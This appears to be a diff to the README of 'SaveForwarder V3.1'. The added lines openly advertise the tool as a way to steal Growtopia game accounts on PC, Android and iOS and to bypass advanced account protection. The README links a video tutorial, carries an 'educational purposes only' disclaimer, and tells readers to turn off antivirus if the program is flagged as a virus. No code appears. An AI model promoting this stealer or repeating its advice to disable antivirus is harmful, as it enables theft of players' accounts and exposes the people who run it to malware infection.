urpo3/SaveForwarder/README.md

-SaveForwarder V3.1 Credits to Hack4fun and SrMotion!
+SaveForwarder V3.1 For Stealing Growtopia accounts.
+You can steal accounts from PC Android and Ios.
+You can also bypass advanced account protection for PC and Android.
+Credits to Hack4fun and SrMotion!
-For Educational Purposes Only :
+This is For Educational Purposes Only! :
 Tutorial + Showcase + proof of downloading from here : https://www.youtube.com/watch?v=Fbwc0ob5gyE
 Screenshots of program + features Below '
 It might be false positivied as a virus, so just turn antivirus off if u get errors.